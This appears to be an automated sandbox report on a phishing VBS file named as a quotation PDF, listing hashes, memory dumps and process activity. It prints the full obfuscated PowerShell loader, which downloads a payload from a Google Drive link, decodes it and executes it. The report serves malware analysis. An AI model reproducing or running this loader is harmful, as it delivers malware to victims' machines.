MD5 b3d91ec6a3eb97821759453637c6c7ad
SHA1 471d11af010f2d40bd90d9744fe9d15d964645e4
SHA256 afb489226c47e56fdcebdba5d21447c4f5422ce541ce21c389d62fa8b9d5865e
SHA512 227586fd756d00597c50b7fb9891c35f68bcc15397cc161164fb37ee5a6d4c78e6361d3f053d4442e812e05f9e6913071b795a0ea063f7e1779b80852b80e333

memory/1840-46-0x0000000008BD0000-0x0000000009EC2000-memory.dmp

memory/1168-60-0x0000000000CB0000-0x0000000001F04000-memory.dmp

memory/1168-62-0x0000000000CB0000-0x0000000000CF8000-memory.dmp

memory/1168-61-0x0000000000CB0000-0x0000000001F04000-memory.dmp

memory/1168-63-0x0000000020A90000-0x0000000020B2C000-memory.dmp

memory/1168-65-0x00000000215F0000-0x00000000217B2000-memory.dmp

memory/1168-66-0x0000000020EC0000-0x0000000020F10000-memory.dmp

memory/1168-68-0x00000000217C0000-0x0000000021852000-memory.dmp

memory/1168-69-0x0000000020FA0000-0x0000000020FAA000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-30 06:23

Reported

2024-10-30 06:25

Platform

win7-20240903-en

Max time kernel

150s

Max time network

122s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request For Quotation-RFQ097524_Pdf.vbs"

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request For Quotation-RFQ097524_Pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Skravereapparat Brnecykels Chilotomy Allegorien #>;$rlingsankerets='Blissful';<#Revanchekamps Ledestjerne Dandyishly Momotidae Anraaber Rommens #>; function Indbankende($Udspejdes){If ($host.DebuggerEnabled) {$Nationalrettens++;}$Refusionsopgrelsen=$Notwithstanding+$Udspejdes.'Length'-$Nationalrettens; for ( $Skillessness=5;$Skillessness -lt $Refusionsopgrelsen;$Skillessness+=6){$vejle=$Skillessness;$spejlet+=$Udspejdes[$Skillessness];}$spejlet;}function Pyrogens($Woblernes){ . ($Brinkmanns) ($Woblernes);}$Konformistiske=Indbankende 'LicenM DevioCeleszPersoiAffejlAa sklB dgraCusto/ko,st ';$Unsimulated156=Indbankende 'PrdisTcr,nalOrgans vile1 Shin2Forha ';$Mirjas='prove[AtramNStjerET,eogTK pit. dstas ,emaePar orFavorvPaniciSibilCKo,ceeSsl.np ExtooSpgelISpiriNReforTSlaaemLedsaaUttheNJow eAKeerigTusseEMaaleRAp ca] cari:Ch li:SeacoSSubpaERhinoCSnkniUCitywRInforiRepo tWolfrYEpexep L,derSkrivoUn alTAnseeO,jeneCFlygtOSoloslHyper=Drama$ tomiuRegisn CacoSProtii ugtiMRecliUEmblel MoldaMaaletFravreRom.ndHange1Faggo5Sanch6Jej,n ';$Konformistiske+=Indbankende 'Solst5Inter.St ki0Triss arbl(S micWInd eiBrndenNonsudAfs ioSidemwImpsosInsna cho dNSta iTCogit retsl1Disbo0 Kon .medde0 Sama;Safir BasylWstiksiUdv sn Pl u6Nedsl4 ,rig;Outsi .roldxThirs6Utthe4Diopt; Insi canalrChu,mvEffer:Crino1 Suba3Mangl1Affyr. Laps0Viv.c)Jenbr PartsGUni reHagbacUnt ekDis eoSaltp/Idiot2Gobyp0Puppe1Kandi0Haang0Under1U rmn0Hverd1Melli Af nF rusvi nterbattleKb anfsaarso Und xOkseb/Svine1Afkld3Rep o1anthe.Kidne0 B ug ';$Platoniker=Indbankende ',apesuFor,osUniveESordiR Fa,t-partiaMasseGApterEFrivoNBourntCopro ';$Udbldningers=Indbankende ' Dm nhUrnegtTypogts rmopArrens Call:Dyrlg/ nage/Preced.ilkar .rtiiUndervOutcaeFarve.NeodagefteroPlumoo SkrdgIndkol New eNrlse.StentcBevidoWoodym uses/opdrauImmatcFable?Pyro.eMisvix An epTissuosuperrDysletMgald=VentrdPuirso Kirkw Impen SeselDeprioDipnear fledKamm & Ma aiAnteddacc u=Softw1Mater2HumboVP,rineKryds-prod.AFarengUlkenfSkalpT VulcuMa giCukr iK Unm n.eceniA lesh rude7Statsa phonWR.spolSamme3Tilt,9ge tez SommpJubelQValseuUdskaj SkamkLabyrCGardiw RecogBremsdBijobHTeosoT,rste ';$Rattus=Indbankende 'c,rks>.ajor ';$Brinkmanns=Indbankende ' aldiDoumaemalacX Cr o ';$Fient='Outrivalled';$Skandinavist='\Bortelimeneres.Uds';Pyrogens (Indbankende 'Rudim$DozerGRainwL MangO OverbP lgrA S lel Regn:RadiuAtrikom nterBFiraaITk,edTDaktyiTilbasClothE ChamRmorale latasUndet=Explo$R ughEBel jnBallovInact:Bil,oAing nPGrat P SqueDSuperATorskt,latiaStrab+Ftncm$ .oussBl,bmKNeapoASvensNTakr DTo.sii inimn Sa nAS illVUdkigi essls Dre.tFra.r ');Pyrogens (Indbankende 'Zooph$ SterGTo,meL GuimO Schib eurya I trLletha:dialesMal,rUL fttpNondee Un,artaktfLCent,ADul.iBHal lOFdse RIsen,iElectoPhysouKalliSPsyc.nUnderEMult sInte,sMesch=Givti$TithouSyndidNedblB TabiLInvalDFrednnMarkeIU ocaN.nputG Per,ERos,bRVes,csUdenr.remisSFunduPFo,reL umbi amueTKr dr( onog$FormoR DelmAF rhaT Lnovt,agaeuRouses mort)Pinne ');Pyrogens (Indbankende $Mirjas);$Udbldningers=$superlaboriousness[0];$Verifikationens=(Indbankende 'Subca$G utcgLikvilre,reOHerm BPlodda s dalBrob : ReveIInstamRaketmVoldgAUnrufricterCFengeEAfmilS.lissc.lectIRdhaab BevglResigEu pan5Ap lo=JoannNQui.zeUdtalW Assi-HalvnOLeksibPandejSa,dsE ampCL.erbT Semi antshSPhysiyChikiSCykelt,aataEBlithMFrids.PosttnKr gsE nkartJehul.TegniwlifeseRegulbCrumbC ontrLAfhugiIndrme Tredn F astekspe ');Pyrogens ($Verifikationens);Pyrogens (Indbankende 'Koord$UnderIKujonmKildemAp alaVarebrSlskicSrv,reSatirsForsoc RegiihjemlbabelilSuluderelak5Rkeen.GabbiH yrogeMa ara hjr dGenereBa,serVirgosSubco[Pulas$ g.leP SkiblIllusa VisutKio,koStukknReshoiIsagokAnmrkeF,rgarCirke]Lsgr =Perso$ Bi.tKHuedeo Pan n Accif UlydobasigrOv rbmSytteiSkyldsA otetBegrliHe edsVnnedkNonh.eSorns ');$Strops203=Indbankende 'Hje,l$ StraIThundmHospimUdarma DegnrBescucKiwifeBosats ProrcMisi iGennebUstillForepe Anse5Milke.ChummDProg.oMetapw PolenMorn lSubs.oCraziaR tradbirkeFSub riLeadllC nnieTuris(S let$ ssegURavkndO erpbMajorlHedondMam nnAsieniOve nnV nregTopi e Brolr JulesDups , Inte$ saetP Forlo AngisEx,rot Odyst DommhN taly iplorTillgo B,vaiMelled IndraNo dvl Nd r)Misun ';$Postthyroidal=$Ambitiseres;Pyrogens (Indbankende 'Salie$ Sejugbarrel Ded.oGastrbGroanaParallSu or: SuboN UranoHresin CycyrL arne WeekQMi jsu vvei UnliS L rsIContetnitraeMi er=Seleu(SolostFjerneBlokastoksiT tire- Un hpHysteASkabsTInputh .hau eve$Dorsop Tilso epi SDis,eT nosttC argHStyrey InteRForbroRetsfiArabiDFabelaUn,raLsubtr)Hebra ');while (!$Nonrequisite) {Pyrogens (Indbankende 'Clina$ Kiasg tte lNavigoIn,flbUnlenamoililSpoli:CentiO angivDrifteSa iarBet.ehBirodoTanetl LnkoiIrishnKonfueE carstas es Aebl=Hybel$ UntrtLavherGreveu Dawne.orts ') ;Pyrogens $Strops203;Pyrogens (Indbankende 'Arti,SForflTDisaraproc,r artTFilov-SrskrSIl egl T amEStaldep iorPCl.rk Kajsp4Imeri ');Pyrogens (Indbankende ' Spri$OutwogWildiL Gok O undeBForskaWith.LDomme:Rr ddnF jlpoSuperndo ber PolyeC.mmeqSkambUViseliH.lvoSGermaIrift TStadfeCingu=Slger(Hyt eTTelegEPeppes Ton Tforly-IndbjPBlidea .fsktGinenh Unex Aris$FirempSugamOC,nomsProgrTBir.et Unu hSol,iY TerrRBas loRutsjI Apo,DFissuaA aziL,lama)Ne li ') ;Pyrogens (Indbankende 'Couri$AarenG Ons Lfolkeo.essubAf.edaDelegLci,il:LiterlTr.ppE JagtT fkbeT valie beklsGrucctOblivEUk,ukS Slag=Unint$Psyc,GRaadgL.ktexOKishkb B ggaWaferL Bush:Kde,eiBankbDSkamfEBarneNOutcatAdelsIDuvniTMarkeeAf krT S syS KaffPR gklrEggheONonbeb UndelPeploeacce,mNebraEUnd rTPrestspret +Bispo+Po zo%Filmm$ArtikSFacituStn ePRisenEBerthr SeleLLap laGittiBSu,ero SyssrOoi.si .ateo MellU N nvS.rednNPrefaE Impasari,rS Rund.AffircunlinOBu kiuRentenVugn TRamli ') ;$Udbldningers=$superlaboriousness[$Lettestes];}$Omdigtning=318395;$Uforsrgedes=31683;Pyrogens (Indbankende 'Baby $ Afk GIndkol R enOPrecoBSelvfA,hichlB,ond:VifilB.aninaClipsrFrsteYAposeS SnegP.verhhMaculeFidfaRRednie Ree mosg.=Dwa f EtatsGtelegEPockiTpough- DelmCTo.dioDefaiNvaabeTBl thES rygnSubarTLseng Tra,$DegenpVkkerOSkilbsTrillTPiecetVexatH kroby mertrFan,eO utatiHermeDC.sigaUdplulB.mhu ');Pyrogens (Indbankende ' Simp$Bahr gAttrilTrestoretrab c pyaSkattlS,inn:SprogD Bldhr UmbeaSube.nBorsyksrhfte EnerrTagryeRegio1Gul.y5Ford.3Slank Pa.as=Rejse Gril[TawdrSStandyUntersCompet Bre.eGl rem Biog.TabulCbilggoInforn udskvDreameDatabrAagettSider]P uci:Story:AutopFBouchrsalgboLudwim CincB Pr.caSlvbesFodere Flag6Overs4SneglSWooletKompirAfflaiNasarnRund.gVitup( Ldin$SlantBZarzuaFniker PaakyDrawbsEmblepr sunhOver eSeraerAmphieSpeku) arro ');Pyrogens (Indbankende ' fkli$.ammeGL getlWayako amibAfstdAKon rlPalai:.esepRly edOBereguP askg elfrhRosenI Fo tSU.smohSurde Smila= Paro nat.r[DrnedSKadenYTodd.Sexem TGoodleRecitM Met .alvorTRul eE arkeXAngartIndor. oldeELdrepnGraphCRepolO UdbeDKnoglISubclNDvrgfGfable]under: inni:Spid A ReseSDesilCG apaiIrratiNo de.,nkleg DentERentetS cias orstTtysaRMetasi Lgnen Platgdisem(Blods$Debi.DBlomsr NoncAUnbomNarbejKPasteesove RafmysEwullc1Physi5B.rne3Hornb)aceit ');Pyrogens (Indbankende 'Plati$detaigR zorlTil.oO,ugbrbNatalaMerliL.ensy:VaultFFarceLNunshE BreaTEj ndf Blo.E PrisL olshtNarageRhe mr Prob=.nter$ Fa irKvadroOuz,suLicenGS lliHDi saIFe dsSbeva hBel.j.ServiSMistnuMelleBAndens zaret V,olRSkallI Th nNHekseG Pi u(Inter$MadweOForstM StaddMedioIDinosGProceTImpernKjersIChuntnA lerg Hyal,Flde.$UmtteU B,kefOvertOVernar CensSSemitrWeepiGVerrieRm.blD S,ameFebe,SAbsol)Delfl ');Pyrogens $Fletfelter;"

Network

N/A

Files

memory/2588-4-0x000007FEF5BDE000-0x000007FEF5BDF000-memory.dmp

memory/2588-5-0x000000001B670000-0x000000001B952000-memory.dmp

memory/2588-6-0x0000000001C10000-0x0000000001C18000-memory.dmp

memory/2588-7-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp

memory/2588-8-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp

memory/2588-9-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp

memory/2588-10-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp

memory/2588-11-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp

memory/2588-12-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp

memory/2588-13-0x000007FEF5BDE000-0x000007FEF5BDF000-memory.dmp

memory/2588-14-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp

memory/2588-15-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp

memory/2588-16-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp

memory/2588-17-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp